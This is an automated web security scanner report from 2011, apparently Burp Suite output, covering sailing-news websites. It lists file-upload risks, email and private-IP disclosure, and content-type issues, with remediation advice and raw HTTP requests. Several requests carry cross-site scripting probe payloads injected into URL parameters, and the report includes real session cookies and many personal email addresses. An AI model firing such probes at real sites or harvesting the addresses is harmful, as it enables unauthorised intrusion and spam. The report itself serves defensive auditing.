Transmission of viruses and other malware
Denial of service
You should review the file upload functionality to understand its purpose, and establish whether uploaded content is ever returned to other application users, either through their normal usage of the application or by being fed a specific link by an attacker.
Some factors to consider when evaluating the security impact of this functionality include:
Whether uploaded content can subsequently be downloaded via a URL within the application.
What Content-type and Content-disposition headers the application returns when the file's content is downloaded.
Whether it is possible to place executable HTML/JavaScript into the file, which executes when the file's contents are viewed.
Whether the application performs any filtering on the file extension or MIME type of the uploaded file.
Whether it is possible to construct a hybrid file containing both executable and non-executable content, to bypass any content filters - for example, a file containing both a GIF image and a Java archive (known as a GIFAR file).
What location is used to store uploaded content, and whether it is possible to supply a crafted filename to escape from this location.
Whether archive formats such as ZIP are unpacked by the application.
How the application handles attempts to upload very large files, or decompression bomb files.
Issue remediation
File upload functionality is not straightforward to implement securely. Some recommendations to consider in the design of this functionality include:
Use a server-generated filename if storing uploaded files on disk.
Inspect the content of uploaded files, and enforce a whitelist of accepted, non-executable content types. Additionally, enforce a blacklist of common executable formats, to hinder hybrid file attacks.
Enforce a whitelist of accepted, non-executable file extensions.
If uploaded files are downloaded by users, supply an accurate non-generic Content-type header, and also a Content-disposition header which specifies that browsers should handle the file as an attachment.
Enforce a size limit on uploaded files (for defense-in-depth, this can be implemented both within application code and in the web server's configuration.
Reject attempts to upload archive formats such as ZIP.
Request
GET /article_submission.php HTTP/1.1 Host: www.sailinganarchy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=140109105.1295482420.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=140109105.1341788743.1295482420.1295482420.1295482420.1; __utmc=140109105; __qca=P0-287484067-1295482430152; __utmb=140109105.2.10.1295482420;
Response
HTTP/1.1 200 OK Date: Thu, 20 Jan 2011 00:23:57 GMT Server: Apache Vary: User-Agent Content-Length: 3970 Connection: close Content-Type: text/html
The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.
However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.
Issue remediation
You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).
The following email address was disclosed in the response:
klaus.hartl@stilbuero.de
Request
GET /scripts/jquery.cookie.js HTTP/1.1 Host: americascup.mediaaccess.evolix.net Proxy-Connection: keep-alive Referer: http://americascup.mediaaccess.evolix.net/index.php?lang=en&fn=folio&FolioID=82&co=180dea'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E985349a7ad9 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=2cdacce4859623350a763430bcc636fd
Response
HTTP/1.1 200 OK Date: Thu, 20 Jan 2011 14:09:08 GMT Server: Apache Last-Modified: Tue, 22 Jun 2010 09:00:35 GMT ETag: "20c4781-f61-4899aa78012c0" Accept-Ranges: bytes Vary: Accept-Encoding Content-Type: application/javascript Content-Length: 3937
/** * Cookie plugin * * Copyright (c) 2006 Klaus Hartl (stilbuero.de) * Dual licensed under the MIT and GPL licenses: * http://www.opensource.org/licenses/mit-license.php * http://www.gnu.org/li ...[SNIP]... kie will be set and the cookie transmission will * require a secure protocol (like HTTPS). * @type undefined * * @name $.cookie * @cat Plugins/Cookie * @author Klaus Hartl/klaus.hartl@stilbuero.de */
/** * Get the value of a cookie with the given name. * * @example $.cookie('the_cookie'); * @desc Get the value of a cookie. * * @param String name The name of the cookie. * @return The value of the cookie. * @type String * * @name $.cookie * @cat Plugins/Cookie * @author Klaus Hartl/klaus.hartl@stilbuero.de */ jQuery.cookie = function(name, value, options) { if (typeof value != 'undefined') { // name and value given, set cookie options = options || {}; if (value === null) {
The following email address was disclosed in the response:
erik@bosrup.com
Request
GET /scripts/overlib.js HTTP/1.1 Host: americascup.mediaaccess.evolix.net Proxy-Connection: keep-alive Referer: http://americascup.mediaaccess.evolix.net/index.php?lang=en&fn=folio&FolioID=82&co=180dea'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E985349a7ad9 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=2cdacce4859623350a763430bcc636fd
Response
HTTP/1.1 200 OK Date: Thu, 20 Jan 2011 14:09:10 GMT Server: Apache Last-Modified: Tue, 22 Jun 2010 09:00:36 GMT ETag: "20c479c-a013-4899aa78f5500" Accept-Ranges: bytes Vary: Accept-Encoding Content-Type: application/javascript Content-Length: 40979
//\////////////////////////////////////////////////////////////////////////////////////\ overLIB 3.50 -- This notice must remain untouched at all times.//\ Copyright Erik Bosrup 1998-2001. All rights reserved.//\ By Erik Bosrup (erik@bosrup.com). Last modified 2001-08-28.//\ Portions by Dan Steinman (dansteinman.com). Additions by other people are//\ listed on the overLIB homepage.//\//\ Get the latest version at http://www.bosrup.co ...[SNIP]...
The following email address was disclosed in the response:
klaus.hartl@stilbuero.de
Request
GET /scripts/jquery.cookie.js HTTP/1.1 Host: www.americascupmedia.com Proxy-Connection: keep-alive Referer: http://www.americascupmedia.com/index.php?lang=en&fn=folio&FolioID=83&co=19bf0a'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E4694b2364e4 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=15f512b76e0f340670eb9edf49aacf77
Response
HTTP/1.1 200 OK Date: Thu, 20 Jan 2011 01:14:14 GMT Server: Apache Last-Modified: Tue, 22 Jun 2010 09:00:35 GMT ETag: "20c4781-f61-4899aa78012c0" Accept-Ranges: bytes Vary: Accept-Encoding Content-Type: application/javascript Content-Length: 3937
/** * Cookie plugin * * Copyright (c) 2006 Klaus Hartl (stilbuero.de) * Dual licensed under the MIT and GPL licenses: * http://www.opensource.org/licenses/mit-license.php * http://www.gnu.org/li ...[SNIP]... kie will be set and the cookie transmission will * require a secure protocol (like HTTPS). * @type undefined * * @name $.cookie * @cat Plugins/Cookie * @author Klaus Hartl/klaus.hartl@stilbuero.de */
/** * Get the value of a cookie with the given name. * * @example $.cookie('the_cookie'); * @desc Get the value of a cookie. * * @param String name The name of the cookie. * @return The value of the cookie. * @type String * * @name $.cookie * @cat Plugins/Cookie * @author Klaus Hartl/klaus.hartl@stilbuero.de */ jQuery.cookie = function(name, value, options) { if (typeof value != 'undefined') { // name and value given, set cookie options = options || {}; if (value === null) {
The following email address was disclosed in the response:
erik@bosrup.com
Request
GET /scripts/overlib.js HTTP/1.1 Host: www.americascupmedia.com Proxy-Connection: keep-alive Referer: http://www.americascupmedia.com/index.php?lang=en&fn=folio&FolioID=83&co=19bf0a'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E4694b2364e4 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=15f512b76e0f340670eb9edf49aacf77
Response
HTTP/1.1 200 OK Date: Thu, 20 Jan 2011 01:14:15 GMT Server: Apache Last-Modified: Tue, 22 Jun 2010 09:00:36 GMT ETag: "20c479c-a013-4899aa78f5500" Accept-Ranges: bytes Vary: Accept-Encoding Content-Type: application/javascript Content-Length: 40979
//\////////////////////////////////////////////////////////////////////////////////////\ overLIB 3.50 -- This notice must remain untouched at all times.//\ Copyright Erik Bosrup 1998-2001. All rights reserved.//\ By Erik Bosrup (erik@bosrup.com). Last modified 2001-08-28.//\ Portions by Dan Steinman (dansteinman.com). Additions by other people are//\ listed on the overLIB homepage.//\//\ Get the latest version at http://www.bosrup.co ...[SNIP]...
The following email address was disclosed in the response:
aldous.gc@wanadoo.fr
Request
GET /news/newsList.php?cat=2 HTTP/1.1 Host: www.bymnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 20 Jan 2011 00:45:23 GMT Server: Apache X-Powered-By: PHP/5.2.6 Connection: close Content-Type: text/html Content-Length: 50710
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The following email address was disclosed in the response:
sam@conio.net
Request
GET /scripts/prototype.js HTTP/1.1 Host: www.bymnews.com Proxy-Connection: keep-alive Referer: http://www.bymnews.com/news/newsList.php?cat=2%00993e4%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea3764319929 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Thu, 20 Jan 2011 01:19:13 GMT Server: Apache Last-Modified: Fri, 11 Apr 2008 06:06:41 GMT ETag: "628995d-b9f3-44a92bcdb1e40" Accept-Ranges: bytes Content-Length: 47603 Connection: close Content-Type: application/javascript
/* Prototype JavaScript framework, version 1.4.0 * (c) 2005 Sam Stephenson <sam@conio.net> * * THIS FILE IS AUTOMATICALLY GENERATED. When sending patches, please diff * against the source tree ...[SNIP]...
The following email address was disclosed in the response:
scot@sailinganarchy.com
Request
GET /advertise.htm HTTP/1.1 Host: www.sailinganarchy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=140109105.1295482420.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=140109105.1341788743.1295482420.1295482420.1295482420.1; __utmc=140109105; __qca=P0-287484067-1295482430152; __utmb=140109105.2.10.1295482420;
Response
HTTP/1.1 200 OK Date: Thu, 20 Jan 2011 00:23:32 GMT Server: Apache Last-Modified: Mon, 18 Jan 2010 21:56:20 GMT ETag: "21dc76-3008-6c654900" Accept-Ranges: bytes Content-Length: 12296 Vary: User-Agent Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <input type="hidden" name="business" value="scot@sailinganarchy.com" /> ...[SNIP]...
The following email address was disclosed in the response:
webmaster@sailinganarchy.com
Request
GET /breymaiersailing.com HTTP/1.1 Host: www.sailinganarchy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=140109105.1295482420.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=140109105.1341788743.1295482420.1295482420.1295482420.1; __utmc=140109105; __qca=P0-287484067-1295482430152; __utmb=140109105.2.10.1295482420;
Response
HTTP/1.1 404 Not Found Date: Thu, 20 Jan 2011 00:23:15 GMT Server: Apache Accept-Ranges: bytes Vary: User-Agent Connection: close Content-Type: text/html Content-Length: 1984
<html> <head> <title>NetHere: URL Not Found (404)</title> <link rev="made" href="mailto:webmaster@sailinganarchy.com"> <style> a:link { color : #092769; } a:visited { color : #092769;
The following email addresses were disclosed in the response:
support@yachtscoring.com
www.stcroixyc@gmail.com
Request
GET /calendar/index.php HTTP/1.1 Host: www.sailinganarchy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=140109105.1295482420.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=140109105.1341788743.1295482420.1295482420.1295482420.1; __utmc=140109105; __qca=P0-287484067-1295482430152; __utmb=140109105.2.10.1295482420;
Response
HTTP/1.1 200 OK Date: Thu, 20 Jan 2011 00:24:04 GMT Server: Apache Vary: User-Agent Connection: close Content-Type: text/html Content-Length: 71420
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charse ...[SNIP]... <a href="http://www.stcroixyc@gmail.com" class="calendar_name"> ...[SNIP]... <a href="mailto:support@yachtscoring.com"> ...[SNIP]...
The following email address was disclosed in the response:
editor@sailinganarchy.com
Request
GET /editor/audio_video.php HTTP/1.1 Host: www.sailinganarchy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=140109105.1295482420.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=140109105.1341788743.1295482420.1295482420.1295482420.1; __utmc=140109105; __qca=P0-287484067-1295482430152; __utmb=140109105.2.10.1295482420;
Response
HTTP/1.1 200 OK Date: Thu, 20 Jan 2011 00:24:01 GMT Server: Apache Vary: User-Agent Connection: close Content-Type: text/html Content-Length: 122549
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>Sailin News and ...[SNIP]... <a href="mailto:editor@sailinganarchy.com"> ...[SNIP]...
The following email addresses were disclosed in the response:
bill@farryachtsales.com
btomkies@regatta-manager.com
editor@sailinganarchy.com
info@BicSportNA.com
krista@trippdesign.net
sales@cstcomposites.com
Request
GET /editor/pimpin.php HTTP/1.1 Host: www.sailinganarchy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=140109105.1295482420.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=140109105.1341788743.1295482420.1295482420.1295482420.1; __utmc=140109105; __qca=P0-287484067-1295482430152; __utmb=140109105.2.10.1295482420;
Response
HTTP/1.1 200 OK Date: Thu, 20 Jan 2011 00:24:01 GMT Server: Apache Vary: User-Agent Connection: close Content-Type: text/html Content-Length: 70163
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>Sailin News and ...[SNIP]... <a href="mailto:btomkies@regatta-manager.com"> ...[SNIP]... <a href="mailto:info@BicSportNA.com">info@BicSportNA.com</a> ...[SNIP]... <a href="mailto:editor@sailinganarchy.com"> ...[SNIP]... <a href="mailto:krista@trippdesign.net"> ...[SNIP]... <a href="mailto:sales@cstcomposites.com">sales@cstcomposites.com</a> ...[SNIP]... <a href="mailto:bill@farryachtsales.com"> ...[SNIP]...
The following email address was disclosed in the response:
markracine@gmail.com
Request
GET /index_page2.php HTTP/1.1 Host: www.sailinganarchy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=140109105.1295482420.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=140109105.1341788743.1295482420.1295482420.1295482420.1; __utmc=140109105; __qca=P0-287484067-1295482430152; __utmb=140109105.2.10.1295482420;
Response
HTTP/1.1 200 OK Date: Thu, 20 Jan 2011 00:23:24 GMT Server: Apache Vary: User-Agent Connection: close Content-Type: text/html Content-Length: 96490
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <meta name="ke ...[SNIP]... <a href="mailto:markracine@gmail.com"> ...[SNIP]... <a href="mailto:markracine@gmail.com"> ...[SNIP]...
The following email address was disclosed in the response:
webmaster@EchoChrist.com
Request
GET /java/ad_rotation.js HTTP/1.1 Host: www.sailinganarchy.com Proxy-Connection: keep-alive Referer: http://www.sailinganarchy.com/index_page1.php Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=140109105.1295482420.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=140109105.1341788743.1295482420.1295482420.1295482420.1; __utmc=140109105; __utmb=140109105.1.10.1295482420
Response
HTTP/1.1 200 OK Date: Thu, 20 Jan 2011 00:12:51 GMT Server: Apache Last-Modified: Wed, 27 Oct 2010 15:57:18 GMT ETag: "33467e-119f-47a43380" Accept-Ranges: bytes Content-Length: 4511 Vary: User-Agent Content-Type: application/x-javascript
// Java Document /////////////////////////////////////////////////////////// /// Magic Image Rotation /// /// v 1.0.1 /// /// Copyright 2007, Loyce Bradley Petrey /// /// All Rights Reserved. /// /// http://www.EchoChrist.com/MagicImage /// /// webmaster@EchoChrist.com /// /// /// /// This script is free to use as long as this notice /// /// remains unchanged and intact. /// /// /// /// This program is free software: you can redistribute /// /// it and/or modify it ...[SNIP]...
The following email addresses were disclosed in the response:
ed@sailinganarchy.com
info@sailinganarchy.com
Request
GET /terms.htm HTTP/1.1 Host: www.sailinganarchy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=140109105.1295482420.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=140109105.1341788743.1295482420.1295482420.1295482420.1; __utmc=140109105; __qca=P0-287484067-1295482430152; __utmb=140109105.2.10.1295482420;
Response
HTTP/1.1 200 OK Date: Thu, 20 Jan 2011 00:23:37 GMT Server: Apache Last-Modified: Fri, 21 May 2010 03:53:05 GMT ETag: "21dc74-5410-a0df6a40" Accept-Ranges: bytes Content-Length: 21520 Vary: User-Agent Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... notices from the materials. If you believe any content appearing on our website constitutes a copyright or trademark infringement of another parties’ rights, please contact us immediately at [info@sailinganarchy.com] to notify us.</font> ...[SNIP]... r proprietary notices from the materials. If you believe any content appearing on our website constitutes a copyright infringement of another parties’ rights, please contact us immediately at ed@sailinganarchy.com to notify us of this infringement.</font> ...[SNIP]...
The following email address was disclosed in the response:
ronny.adsetts@amazinginternet.com
Request
GET /velux_5_oceans_2010_race/ HTTP/1.1 Host: www.w-w-i.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following email address was disclosed in the response:
luiz@intercreate.com
Request
GET /event_results_cumulative.cfm?eID=408 HTTP/1.1 Host: www.yachtscoring.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 20 Jan 2011 00:54:29 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=6963868;expires=Sat, 12-Jan-2041 00:54:29 GMT;path=/ Set-Cookie: CFTOKEN=60199100;expires=Sat, 12-Jan-2041 00:54:29 GMT;path=/ Set-Cookie: CFID=6963868;path=/ Set-Cookie: CFTOKEN=60199100;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<HTML> <HEAD> <TITLE>Yacht Scoring - A complete web based r ...[SNIP]... <META NAME="reply-to" CONTENT="luiz@intercreate.com (Interactive Creations Web Site Development)"> ...[SNIP]...
15. Private IP addresses disclosedpreviousnext There are 2 instances of this issue:
RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.
Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.
Issue remediation
There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.
The following RFC 1918 IP address was disclosed in the response:
10.2.130.111
Request
GET /submit?phase=2&url=http://blip.tv/file/4639878/&title=Sundog%20SeaCart%2030%20-%20Ft%20Lauderdale%20to%20Key%20West%202011%20-%20DeckCam HTTP/1.1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.
In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.
GET /ad/g/1?nw=10274&pvrn=Insert Random Number Here&csid=display&resp=ad;;ptgt=s&envp=g_js&slid=Rectangle&w=300&h=250 HTTP/1.1 Host: 2822.v.fwmrm.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _cph="1295039779.438.1.1,"; _sid="a116_5564054660803241609"; _sc="sg23001.1295482428.1295482477.28800.0.21,"; _auv="g23001~1.1295482477.0,13310.1295482477.0,^"; _uid="a104_5562153497824379009"; NSC_ozdbewjq3.gxnsn.ofu=ffffffff09091f3545525d5f4f58455e445a4a423209; _wr="g23001"; _vr="1295482435..60536~60671~66149~103579~170504~173095~306401~,";
Response
HTTP/1.0 400 Bad Request Content-Type: text/html Content-Length: 349 Connection: close Date: Thu, 20 Jan 2011 00:32:06 GMT Server: FWS
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
GET /clk HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 500 Error: Not a valid request Content-Type: text/html Content-Length: 45 Date: Thu, 20 Jan 2011 00:35:31 GMT Server: GFE/2.0 Connection: close
GET /creativeCommonsRssModule HTTP/1.1 Host: backend.userland.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Content-Length: 6733 Content-Type: text/html Date: Thu, 20 Jan 2011 00:36:55 GMT Server: UserLand Frontier/9.5-WinNT
GET /favicon.ico HTTP/1.1 Host: backend.userland.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 335 Content-Type: text/html Date: Thu, 20 Jan 2011 01:11:06 GMT Server: UserLand Frontier/9.5-WinNT
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head><title>404 Not Found</title> </head> <body bgcolor="white" text="black" link="blue" vlink="purple" alink="red"> < ...[SNIP]...
GET /favicon.ico HTTP/1.1 Host: www.beneteaucountdown.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=9b1f717bc9dd625a5a9d107d838ec474
Response
HTTP/1.1 404 Not Found Date: Thu, 20 Jan 2011 01:17:07 GMT Server: Apache Accept-Ranges: bytes Connection: close Content-Type: text/html Content-Length: 492
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>404 Not Found</TITLE> </HEAD><BODY> <H1>Not Found</H1> The requested URL /favicon.ico was not found on this server. <HR> <I>www.b ...[SNIP]...
GET /news/newsList.php HTTP/1.1 Host: www.bymnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 20 Jan 2011 00:45:22 GMT Server: Apache X-Powered-By: PHP/5.2.6 Content-Length: 5025 Connection: close Content-Type: text/html
<br /> <b>Warning</b>: Smarty error: unable to read resource: "" in <b>/home/bymnews/newsLib/smarty/Smarty.class.php</b> on line <b>1088</b><br />
GET /onlinepubs/009629399/apdxa.htm HTTP/1.1 Host: www.opengroup.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 20 Jan 2011 00:50:03 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Connection: close Content-Type: text/html Content-Length: 19841
<!-- Copyright 1997 The Open Group, All rights reserved --> <html><head>
GET /ADs/nauticexpo/nauticexpo.htm HTTP/1.1 Host: www.sailinganarchy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=140109105.1295482420.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=140109105.1341788743.1295482420.1295482420.1295482420.1; __utmc=140109105; __qca=P0-287484067-1295482430152; __utmb=140109105.2.10.1295482420;
Response
HTTP/1.1 200 OK Date: Thu, 20 Jan 2011 00:22:50 GMT Server: Apache Last-Modified: Thu, 19 Nov 2009 23:43:14 GMT ETag: "34a303-85e6-ec38a880" Accept-Ranges: bytes Content-Length: 34278 Vary: User-Agent Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title> Sailboats, Catamarans, Sailing dinghies, Mainsails, Drysuits - NauticExpo </title>
GET /breymaiersailing.com HTTP/1.1 Host: www.sailinganarchy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=140109105.1295482420.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=140109105.1341788743.1295482420.1295482420.1295482420.1; __utmc=140109105; __qca=P0-287484067-1295482430152; __utmb=140109105.2.10.1295482420;
Response
HTTP/1.1 404 Not Found Date: Thu, 20 Jan 2011 00:23:15 GMT Server: Apache Accept-Ranges: bytes Vary: User-Agent Connection: close Content-Type: text/html Content-Length: 1984
<html> <head> <title>NetHere: URL Not Found (404)</title> <link rev="made" href="mailto:webmaster@sailinganarchy.com"> <style> a:link { color : #092769; } a:visited { color : #092769;
If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.
In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain XML.
Request
